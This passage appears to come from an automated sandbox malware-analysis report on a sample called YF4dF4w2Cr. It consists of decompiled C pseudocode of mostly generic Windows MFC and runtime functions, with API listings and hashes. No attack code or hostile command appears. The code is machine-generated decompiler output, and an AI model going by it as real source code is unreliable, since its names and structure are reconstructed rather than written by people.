                  • MultiByteToWideChar.KERNEL32(00000080,00000009,004307FC,?,00000000,00000000,?,?,?,?,004307FC,00000000,?), ref: 00442673
                  • MultiByteToWideChar.KERNEL32(00000080,00000009,004307FC,00000001,00000000,00000000,?,?,?,?,004307FC,00000000,?), ref: 004426E1
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                  • String ID:
                  • API String ID: 3058430110-0
                  • Opcode ID: 4f51aa9334f70c85223a4e687f06baf9a762fd662b4e9dda525f56099a8685db
                  • Instruction ID: 7a3e3710ad6dcf06bb425cbd2a2258c827f30c13012a9450a5fd42bd5fc93319
                  • Opcode Fuzzy Hash: 4f51aa9334f70c85223a4e687f06baf9a762fd662b4e9dda525f56099a8685db
                  • Instruction Fuzzy Hash: 5231F331A00246EFEB21DF64C990AAE7BA4FF01310F56856AF4518B291D7B4DD41DB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 97%
                  			E0040A8A9(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t34;
                  				struct HWND__* _t37;
                  				signed int _t38;
                  				void* _t65;
                  				short* _t67;
                  				struct HWND__** _t69;
                  				void* _t70;
                  				struct HWND__** _t74;
                  				intOrPtr _t76;
                  
                  				_t66 = __edi;
                  				_t65 = __edx;
                  				_push(0x10c);
                  				E00431B04(E0044AD6E, __ebx, __edi, __esi);
                  				_t69 =  *(_t70 + 0xc);
                  				_t34 =  *((intOrPtr*)(_t70 + 0x10));
                  				_t74 = _t69;
                  				_t56 = 0 | _t74 != 0x00000000;
                  				 *((intOrPtr*)(_t70 - 0x118)) = _t34;
                  				_t75 = _t74 != 0;
                  				if(_t74 != 0) {
                  					L2:
                  					_t76 = _t34;
                  					_t56 = 0 | _t76 != 0x00000000;
                  					if(_t76 != 0) {
                  						goto L1;
                  					}
                  					E004014C0(_t70 - 0x114, _t65);
                  					_t59 = _t69[2];
                  					_t37 = _t69[1];
                  					_t67 = 0xfffffdf8;
                  					 *((intOrPtr*)(_t70 - 4)) = 0;
                  					if(_t59 != 0xfffffdf8 || (_t69[0x19] & 0x00000001) == 0) {
                  						if(_t59 != 0xfffffdee || (_t69[0x2d] & 0x00000001) == 0) {
                  							goto L8;
                  						} else {
                  							goto L7;
                  						}
                  					} else {
                  						L7:
                  						_t37 = GetDlgCtrlID(_t37);
                  						L8:
                  						if(_t37 == 0) {
                  							L12:
                  							__eflags = _t69[2] - _t67;
                  							if(_t69[2] != _t67) {
                  								_t67 =  &(_t69[4]);
                  								_t38 = MultiByteToWideChar(3, 0,  *(_t70 - 0x114), 0xffffffff, _t67, 0x50);
                  								__eflags = _t67;
                  								if(_t67 != 0) {
                  									__eflags = _t38 - 0x50;
                  									if(_t38 > 0x50) {
                  										_t38 = E00401090(_t59, _t65, 0x80004005);
                  									}
                  								}
                  								__eflags = _t38;
                  								if(_t38 > 0) {
                  									__eflags = _t67;
                  									if(_t67 != 0) {
                  										__eflags = 0;
                  										 *((short*)(_t67 + _t38 * 2 - 2)) = 0;
                  									}
                  								}
                  							} else {
                  								E0040842D(0, _t65, _t67, _t69,  &(_t69[4]), 0x50,  *(_t70 - 0x114), 0xffffffff);
                  							}
                  							 *((intOrPtr*)( *((intOrPtr*)(_t70 - 0x118)))) = 0;
                  							SetWindowPos( *_t69, 0, 0, 0, 0, 0, 0x213);
                  							E004010B0( &(( *(_t70 - 0x114))[0xfffffffffffffff0]), _t65);
                  							__eflags = 1;
                  							L21:
                  							return E00431B87(0, _t67, _t69);
                  						}
                  						_t59 = _t70 - 0x110;
                  						if(E0041B239(0, _t70 - 0x110, _t67, _t69, _t37, _t70 - 0x110, 0x100) != 0) {
                  							E0041B29E(_t70 - 0x114, _t70 - 0x110, 1, 0xa);
                  							goto L12;
                  						} else {
                  							E004010B0( &(( *(_t70 - 0x114))[0xfffffffffffffff0]), _t65);
                  							goto L21;
                  						}
                  					}
                  				}
                  				L1:
                  				_t34 = E00406436(0, _t56, _t66, _t69, _t75);
                  				goto L2;
                  			}













                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0040A8B3
                  • GetDlgCtrlID.USER32 ref: 0040A918
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,00000050,0000010C,00404692,?,?,?), ref: 0040A992
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0040A9CE
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharCtrlException@8H_prolog3H_prolog3_MultiThrowWideWindow
                  • String ID:
                  • API String ID: 1933732581-0
                  • Opcode ID: 3165a1b386513dabdfb5d7ee7af79dfe6ece074409af96b752cbb1d83e808885
                  • Instruction ID: 4d93c7147c348ebad3ea942ba8eea6060f3f1e63af0d97cf858e573eee83d13f
                  • Opcode Fuzzy Hash: 3165a1b386513dabdfb5d7ee7af79dfe6ece074409af96b752cbb1d83e808885
                  • Instruction Fuzzy Hash: AB31E371A003199BCF24DB748D86BEE7264AF04714F110A7EF656F22D1DA789D90CA1B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 82%
                  			E0042495D(void* __ecx, void* __edx, void* __edi, void* __eflags, signed int _a4) {
                  				void* __ebx;
                  				void* __esi;
                  				void* __ebp;
                  				intOrPtr _t29;
                  				intOrPtr _t32;
                  				intOrPtr _t35;
                  				intOrPtr _t36;
                  				intOrPtr _t37;
                  				signed int _t39;
                  				void* _t47;
                  				intOrPtr* _t48;
                  				void* _t50;
                  				void* _t51;
                  				void* _t64;
                  				void* _t65;
                  				intOrPtr _t66;
                  				void* _t68;
                  				void* _t70;
                  
                  				_t65 = __edi;
                  				_t64 = __edx;
                  				_t51 = E0041F396(_t50, __ecx, __edi, _t68, __eflags);
                  				_t29 =  *((intOrPtr*)(_t51 + 0x10));
                  				if(_t29 == 0) {
                  					L19:
                  					return 0 |  *((intOrPtr*)(_t51 + 0x10)) != 0x00000000;
                  				}
                  				_t32 = _t29 - 1;
                  				 *((intOrPtr*)(_t51 + 0x10)) = _t32;
                  				if(_t32 != 0) {
                  					goto L19;
                  				}
                  				if(_a4 == 0) {
                  					L8:
                  					_push(_t65);
                  					_t66 =  *((intOrPtr*)(E0041F363(_t51, _t65, 0, _t77) + 4));
                  					_t70 = E004205AE(0x466508);
                  					if(_t70 == 0 || _t66 == 0) {
                  						L18:
                  						goto L19;
                  					} else {
                  						_t35 =  *((intOrPtr*)(_t70 + 0xc));
                  						_t80 = _t35;
                  						if(_t35 == 0) {
                  							L12:
                  							if( *((intOrPtr*)(_t66 + 0x98)) != 0) {
                  								_t36 =  *((intOrPtr*)(_t70 + 0xc));
                  								_a4 = _a4 & 0x00000000;
                  								_t83 = _t36;
                  								if(_t36 != 0) {
                  									_push(_t36);
                  									_t39 = E004344B4(_t51, _t64, _t66, _t70, _t83);
                  									_push( *((intOrPtr*)(_t70 + 0xc)));
                  									_a4 = _t39;
                  									E004316F6(_t51, _t66, _t70, _t83);
                  								}
                  								_t37 = E0043108C(_t51, _t64, _t66,  *((intOrPtr*)(_t66 + 0x98)));
                  								 *((intOrPtr*)(_t70 + 0xc)) = _t37;
                  								if(_t37 == 0 && _a4 != _t37) {
                  									 *((intOrPtr*)(_t70 + 0xc)) = E0043108C(_t51, _t64, _t66, _a4);
                  								}
                  							}
                  							goto L18;
                  						}
                  						_push(_t35);
                  						if(E004344B4(_t51, _t64, _t66, _t70, _t80) >=  *((intOrPtr*)(_t66 + 0x98))) {
                  							goto L18;
                  						}
                  						goto L12;
                  					}
                  				}
                  				if(_a4 != 0xffffffff) {
                  					_t47 = E00415AD9();
                  					if(_t47 != 0) {
                  						_t48 =  *((intOrPtr*)(_t47 + 0x3c));
                  						_t77 = _t48;
                  						if(_t48 != 0) {
                  							 *_t48(0, 0);
                  						}
                  					}
                  				}
                  				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x20)), _t65);
                  				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x1c)), _t65);
                  				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x18)), _t65);
                  				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x14)), _t65);
                  				E0042488A(_t51,  *((intOrPtr*)(_t51 + 0x24)), _t65);
                  				goto L8;
                  			}






















                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __msize_malloc
                  • String ID:
                  • API String ID: 1288803200-0
                  • Opcode ID: 0a0fb8dd703eed77f7ba8fb0962ca666536f27cc64845c8a66cdf0238207c114
                  • Instruction ID: a563689fdaf21f1efb45e35565f73d8a1b00968b58a58eb4e159542aa28b78ed
                  • Opcode Fuzzy Hash: 0a0fb8dd703eed77f7ba8fb0962ca666536f27cc64845c8a66cdf0238207c114
                  • Instruction Fuzzy Hash: B821D6707006209FCB24AF75E88165F77A4FFC4364B50852FE8188B696DB38DC91CA8C
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E00416327(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t36;
                  				intOrPtr _t40;
                  				intOrPtr* _t44;
                  				void* _t46;
                  				intOrPtr _t47;
                  				void* _t48;
                  				intOrPtr _t54;
                  				void* _t59;
                  				intOrPtr* _t71;
                  				intOrPtr* _t73;
                  				void* _t75;
                  				void* _t76;
                  
                  				_t76 = __eflags;
                  				_push(0x60);
                  				E00431ACE(E0044B391, __ebx, __edi, __esi);
                  				_t71 =  *((intOrPtr*)(_t75 + 8));
                  				_t73 =  *((intOrPtr*)(_t71 + 4));
                  				 *((intOrPtr*)(_t75 - 0x14)) = _t73;
                  				E0040D77C(_t75 - 0x68, _t76);
                  				 *(_t75 - 4) = 0;
                  				 *(_t75 - 4) = 1;
                  				 *((intOrPtr*)(E0041EDAB(0, _t71, _t73, _t76) + 4)) =  *((intOrPtr*)( *_t71 + 4));
                  				_t36 = E0041F363(0, _t71, _t73, _t76);
                  				_t9 = _t36 + 0x74; // 0x74
                  				 *((intOrPtr*)(_t73 + 0x1c)) = _t36;
                  				 *((intOrPtr*)(E00409F26(0, _t9, _t71, _t73, _t76) + 4)) = _t73;
                  				E004161F7(_t73, _t76);
                  				_t40 =  *((intOrPtr*)(E0041F363(0, _t71, _t73, _t76) + 4));
                  				if(_t40 != 0 &&  *((intOrPtr*)(_t73 + 0x20)) == 0) {
                  					_t54 =  *((intOrPtr*)(_t40 + 0x20));
                  					if(_t54 != 0 &&  *((intOrPtr*)(_t54 + 0x20)) != 0) {
                  						E0040EE89(_t75 - 0x68,  *((intOrPtr*)(_t54 + 0x20)));
                  						 *((intOrPtr*)(_t73 + 0x20)) = _t75 - 0x68;
                  					}
                  				}
                  				 *(_t75 - 4) = 0;
                  				_t59 =  *(_t71 + 0x14);
                  				SetEvent( *(_t71 + 0x10));
                  				WaitForSingleObject(_t59, 0xffffffff);
                  				CloseHandle(_t59);
                  				_t44 =  *((intOrPtr*)(_t73 + 0x38));
                  				_t81 = _t44;
                  				if(_t44 == 0) {
                  					_t46 =  *((intOrPtr*)( *_t73 + 0x50))();
                  					__eflags = _t46;
                  					_t47 =  *_t73;
                  					if(_t46 != 0) {
                  						_t48 =  *((intOrPtr*)(_t47 + 0x54))();
                  					} else {
                  						_t48 =  *((intOrPtr*)(_t47 + 0x68))();
                  					}
                  				} else {
                  					_t48 =  *_t44( *((intOrPtr*)(_t73 + 0x34)));
                  				}
                  				E0040EEC5(_t59, _t75 - 0x68);
                  				E00415EE7(_t75 - 0x68, _t81, _t48, 1);
                  				 *(_t75 - 4) =  *(_t75 - 4) | 0xffffffff;
                  				E0040F76D(_t59, _t75 - 0x68, _t71, _t48, _t81);
                  				return E00431B73(0);
                  			}
















                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0041632E
                    • Part of subcall function 004161F7: GetCurrentThreadId.KERNEL32 ref: 0041620A
                    • Part of subcall function 004161F7: SetWindowsHookExA.USER32 ref: 0041621A
                  • SetEvent.KERNEL32(?,00000060), ref: 004163DF
                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 004163E8
                  • CloseHandle.KERNEL32(?), ref: 004163EF
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CloseCurrentEventH_prolog3_catchHandleHookObjectSingleThreadWaitWindows
                  • String ID:
                  • API String ID: 1532457625-0
                  • Opcode ID: 50310d380d5aa45c0703d31aa760e93ca882309b05ff31cb1263a9d8be084b3a
                  • Instruction ID: 7d1a66d4e27a964e3f0b4e2036f0cf801379f83b2f6e36c6b0dae80c5e1ed748
                  • Opcode Fuzzy Hash: 50310d380d5aa45c0703d31aa760e93ca882309b05ff31cb1263a9d8be084b3a
                  • Instruction Fuzzy Hash: 1D318D74A00705DFCB10EFB2C58499DBBB0BF08314B11457EE45A973A2DB38EA85CB98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E00424BC4(void* __ebx, intOrPtr __ecx, void* __edi, void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t15;
                  				intOrPtr _t18;
                  				void* _t22;
                  				void* _t30;
                  				void* _t31;
                  				void* _t39;
                  				intOrPtr _t43;
                  
                  				_t39 = __edi;
                  				_t30 = __ebx;
                  				_push(__ecx);
                  				_push(__ecx);
                  				_t43 = __ecx;
                  				_v12 = __ecx;
                  				_t15 = E0040ED96(__ecx, __eflags);
                  				if(_t15 != 0) {
                  					if((E00412B38(_t43) & 0x00000100) != 0) {
                  						_t35 = _t43;
                  						_t18 = E004105B2(__ebx, _t43, __edi);
                  						_v8 = _t18;
                  						_t49 = _t18;
                  						if(_t18 == 0) {
                  							E00406436(__ebx, _t35, __edi, _t43, _t49);
                  						}
                  						_push(_t30);
                  						_push(_t39);
                  						_t31 = E0040EE3C(_t30, _t35, GetForegroundWindow());
                  						if(_v8 == _t31 || E0040EE3C(_t31, _t35, GetLastActivePopup( *(_v8 + 0x20))) == _t31 && SendMessageA( *(_t31 + 0x20), 0x36d, 0x40, 0) != 0) {
                  							_t22 = 1;
                  							__eflags = 1;
                  						} else {
                  							_t22 = 0;
                  						}
                  						SendMessageA( *(_v12 + 0x20), 0x36d, 4 + (0 | _t22 == 0x00000000) * 4, 0);
                  					}
                  					_t15 = 1;
                  				}
                  				return _t15;
                  			}















                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetForegroundWindow.USER32 ref: 00424C01
                  • GetLastActivePopup.USER32(?), ref: 00424C25
                  • SendMessageA.USER32(?,0000036D,00000040,00000000), ref: 00424C3D
                  • SendMessageA.USER32(?,0000036D,00000000,00000000), ref: 00424C62
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MessageSendWindow$ActiveException@8ForegroundH_prolog3LastLongPopupThrow
                  • String ID:
                  • API String ID: 2019557511-0
                  • Opcode ID: da8f0325275f4c013f387e86fa7bf50d154115ffdca63c4d9d26d7428e297965
                  • Instruction ID: c5b05cd195cb087c410fb02c105aa630a277884f1bcc14efd6469061374fb6a8
                  • Opcode Fuzzy Hash: da8f0325275f4c013f387e86fa7bf50d154115ffdca63c4d9d26d7428e297965
                  • Instruction Fuzzy Hash: 3A11E772B10221BBDB14ABA7ED49F5F3A68EBC5704F02003BB501D3150E678DD00866D
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 67%
                  			E0042C4B2(int __ebx, intOrPtr* __ecx) {
                  				signed int _v8;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t22;
                  				intOrPtr* _t24;
                  				signed int _t26;
                  				signed int _t27;
                  				int _t30;
                  				void* _t36;
                  				intOrPtr* _t39;
                  
                  				_t30 = __ebx;
                  				_push(__ecx);
                  				_t39 = __ecx;
                  				_v8 =  *((intOrPtr*)( *__ecx + 0x1ac))();
                  				_t22 = CreateMenu();
                  				 *(_t39 + 0x110) = _t22;
                  				if(_t22 != 0) {
                  					_t36 = _t39 + 0x114;
                  					E00431160(_t36, _t36, 0, 0x18);
                  					_t24 =  *((intOrPtr*)(_t39 + 0x100));
                  					_push(_t36);
                  					_push( *(_t39 + 0x110));
                  					_push(_t24);
                  					if( *((intOrPtr*)( *_t24 + 0x24))() == 0) {
                  						_t26 = 0;
                  						__eflags = _v8;
                  						if(_v8 != 0) {
                  							__eflags =  *(_t39 + 0x128);
                  							if(__eflags != 0) {
                  								_t26 = 1;
                  								__eflags = 1;
                  							}
                  							_t27 = E0040607D(_t30, _t36, _t39, __eflags,  *(_t39 + 0x110), _v8, _t36, 1, _t26);
                  							 *(_t39 + 0x158) = _t27;
                  							__imp__OleCreateMenuDescriptor( *(_t39 + 0x110), _t36);
                  							__eflags = _t27;
                  							_t18 = _t27 != 0;
                  							__eflags = _t18;
                  							 *(_t39 + 0x12c) = _t27;
                  							_t22 = 0 | _t18;
                  						} else {
                  							_t22 = 1;
                  						}
                  					} else {
                  						DestroyMenu( *(_t39 + 0x110));
                  						 *(_t39 + 0x110) =  *(_t39 + 0x110) & 0x00000000;
                  						_t22 = 0;
                  					}
                  				}
                  				return _t22;
                  			}















                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.659116467.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000001.00000002.659112623.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659156937.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000001.00000002.659178064.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000001.00000002.659187745.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$CreateDestroy_memset
                  • String ID:
                  • API String ID: 2954890696-0
                  • Opcode ID: da75aa6dce72ff148ce3907d131c25f27a074466cf39f28214722d06d9364804
                  • Instruction ID: 1409fe51e83d3908d748dd315e3910663c0b8c09aba28d5bb9e855037b89c16d
                  • Opcode Fuzzy Hash: da75aa6dce72ff148ce3907d131c25f27a074466cf39f28214722d06d9364804
                  • Instruction Fuzzy Hash: 5A118E70A00714AFDB259B31DC49BDB7AE8EF49740F50082EE566D2150DBB1A940DA58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E0041C667(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				wchar_t* _t38;
                  				int _t39;
                  				intOrPtr _t44;
                  				intOrPtr _t51;
                  				signed int _t52;
                  				void* _t54;
                  				void* _t55;
                  
                  				_t49 = __edx;
                  				_push(0x60);
                  				E00431B04(E0044B9C2, __ebx, __edi, __esi);
                  				_t44 =  *((intOrPtr*)(_t55 + 8));
                  				_t51 =  *((intOrPtr*)(_t55 + 0xc));
                  				_t54 = __ecx;
                  				 *((intOrPtr*)(_t55 - 0x68)) = _t44 + _t51 - 1;
                  				 *((intOrPtr*)(_t55 - 0x6c)) =  *((intOrPtr*)(E00415AD9() + 0x20));
                  				_t52 = 0 | _t51 != 0x00000001;
                  				E004014C0(_t55 - 0x64, __edx);
                  				 *(_t55 - 4) =  *(_t55 - 4) & 0x00000000;
                  				if(E0041B29E(_t55 - 0x64,  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x134)) + 0x1c)), _t52, 0xa) != 0) {
                  					_t38 = _t55 - 0x60;
                  					if(_t52 != 0) {
                  						_t39 = swprintf(_t38, 0x50,  *(_t55 - 0x64), _t44,  *((intOrPtr*)(_t55 - 0x68)));
                  					} else {
                  						_t39 = swprintf(_t38, 0x50,  *(_t55 - 0x64), _t44);
                  					}
                  					if(_t39 > 0) {
                  						SendMessageA( *( *((intOrPtr*)(_t55 - 0x6c)) + 0x20), 0x362, 0, _t55 - 0x60);
                  					}
                  				}
                  				E004010B0( &(( *(_t55 - 0x64))[0xfffffffffffffffc]), _t49);
                  				return E00431B87(_t44, _t52, _t54);
                  			}











                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0041C66E
                  • swprintf.LIBCMT ref: 0041C6CB
                    • Part of subcall function 00431BA5: __vsprintf_s_l.LIBCMT ref: 00431BB9
                  • swprintf.LIBCMT ref: 0041C6DF
                  • SendMessageA.USER32(00000362,00000362,00000000,?), ref: 0041C6FC
                  Similarity
                  • API ID: swprintf$H_prolog3_MessageSend__vsprintf_s_l
                  • String ID:
                  • API String ID: 2549095532-0
                  • Opcode ID: 8b0b3faeae5ae158317369ec41045ab26ed870bb68ff8ffac602cff6b4f0144d
                  • Instruction ID: 976522213fad21206c224ef94300dd4b8a2a06ebd09c969b271b5d7d8602737c
                  • Opcode Fuzzy Hash: 8b0b3faeae5ae158317369ec41045ab26ed870bb68ff8ffac602cff6b4f0144d
                  • Instruction Fuzzy Hash: 07115172A40308ABDB10EBE5CC86F9E77B9AF08754F114516F509AB291E738EA50CB18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E004265DF(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
                  				signed int _v8;
                  				char _v24;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				signed int _t13;
                  				CHAR* _t21;
                  				char* _t24;
                  				intOrPtr _t28;
                  				void* _t30;
                  				signed int _t31;
                  
                  				_t28 = __edx;
                  				_t13 =  *0x463404; // 0x18eab29f
                  				_v8 = _t13 ^ _t31;
                  				_t24 = _a8;
                  				_t30 = __ecx;
                  				_t29 = _a4;
                  				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                  					swprintf( &_v24, 0x10, 0x452000, _a12);
                  					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(_t30 + 0x68));
                  				} else {
                  					_t30 = E0042652C(__ecx, _t29);
                  					if(_t30 != 0) {
                  						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
                  						_t29 = _t21;
                  						RegCloseKey(_t30);
                  						_t18 = 0 | _t21 == 0x00000000;
                  					}
                  				}
                  				return E00430650(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
                  			}















                  APIs
                  • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 0042661A
                  • RegCloseKey.ADVAPI32(00000000), ref: 00426623
                  • swprintf.LIBCMT ref: 00426640
                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00426651
                  Similarity
                  • API ID: ClosePrivateProfileStringValueWriteswprintf
                  • String ID:
                  • API String ID: 22681860-0
                  • Opcode ID: b86b5b292ec0335bd37f35b857a2c661ef0f4caf61ce93286ff9f9638cd41884
                  • Instruction ID: e4b09b4b087a4c94818457906bb1b79e27778f0661a387acb9e5ce4406507e57
                  • Opcode Fuzzy Hash: b86b5b292ec0335bd37f35b857a2c661ef0f4caf61ce93286ff9f9638cd41884
                  • Instruction Fuzzy Hash: A5010472600218BBD7109F659C46FBFB7ACEF48714F51042BFA00A3181DAB8ED018768
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00411046(intOrPtr* __ecx) {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				struct HWND__* _t14;
                  				intOrPtr* _t19;
                  				void* _t20;
                  
                  				_t21 = __ecx;
                  				_t19 = __ecx;
                  				if( *((intOrPtr*)( *__ecx + 0x128))() != 0) {
                  					_t21 = __ecx;
                  					 *((intOrPtr*)( *__ecx + 0x188))();
                  				}
                  				SendMessageA( *(_t19 + 0x20), 0x1f, 0, 0);
                  				E0040F918(_t19, _t21,  *(_t19 + 0x20), 0x1f, 0, 0, 1, 1);
                  				_t22 = _t19;
                  				_t20 = E004105B2(_t19, _t19, 0);
                  				_t26 = _t20;
                  				if(_t20 == 0) {
                  					E00406436(_t20, _t22, 0, SendMessageA, _t26);
                  				}
                  				SendMessageA( *(_t20 + 0x20), 0x1f, 0, 0);
                  				E0040F918(_t20, _t22,  *(_t20 + 0x20), 0x1f, 0, 0, 1, 1);
                  				_t14 = GetCapture();
                  				if(_t14 != 0) {
                  					return SendMessageA(_t14, 0x1f, 0, 0);
                  				}
                  				return _t14;
                  			}










                  APIs
                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00411072
                  • SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 0041109D
                  • GetCapture.USER32 ref: 004110AF
                  • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004110BE
                  Similarity
                  • API ID: MessageSend$Capture
                  • String ID:
                  • API String ID: 1665607226-0
                  • Opcode ID: 185650b8f563500d27f63686088aac245195dfa97b6177c27bbaf04c667e405a
                  • Instruction ID: 17e571b5f7ff4c9ef8489950eafba025f931e03d8fe3bfc599a458d3e8fa3cf5
                  • Opcode Fuzzy Hash: 185650b8f563500d27f63686088aac245195dfa97b6177c27bbaf04c667e405a
                  • Instruction Fuzzy Hash: 640175317402947BDB301B638CCDFDB3E7AEBCAB50F110079B705AA1E7C9A54880D664
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E0042E37E(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* _a4, struct _FILETIME* _a8) {
                  				struct _FILETIME _v12;
                  				struct _SYSTEMTIME _v28;
                  				void* __ebp;
                  				int _t23;
                  				int _t25;
                  				void* _t38;
                  				void* _t40;
                  
                  				_t40 = __esi;
                  				_t39 = __edi;
                  				_t38 = __edx;
                  				_t30 = __ebx;
                  				_t44 = _a8;
                  				if(_a8 == 0) {
                  					E00406436(__ebx, __ecx, __edi, __esi, _t44);
                  				}
                  				_push(_t40);
                  				_v28.wYear = E0042E146();
                  				_v28.wMonth = E0042E169();
                  				_v28.wDay = E0042E188();
                  				_v28.wHour = E0042E1A6();
                  				_v28.wMinute = E0042E1C5();
                  				_v28.wSecond = E0042E1E4();
                  				_v28.wMilliseconds = 0;
                  				_t23 = SystemTimeToFileTime( &_v28,  &_v12);
                  				_t42 = GetLastError;
                  				if(_t23 == 0) {
                  					E0042EAA8(_t30, _t38, _t39, GetLastError, GetLastError(), 0);
                  				}
                  				_t25 = LocalFileTimeToFileTime( &_v12, _a8);
                  				if(_t25 == 0) {
                  					_t25 = E0042EAA8(_t30, _t38, _t39, _t42, GetLastError(), _t25);
                  				}
                  				return _t25;
                  			}











                  APIs
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 0042E3E5
                  • GetLastError.KERNEL32(00000000), ref: 0042E3F7
                  • LocalFileTimeToFileTime.KERNEL32(?,00000000), ref: 0042E406
                  • GetLastError.KERNEL32(00000000), ref: 0042E411
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
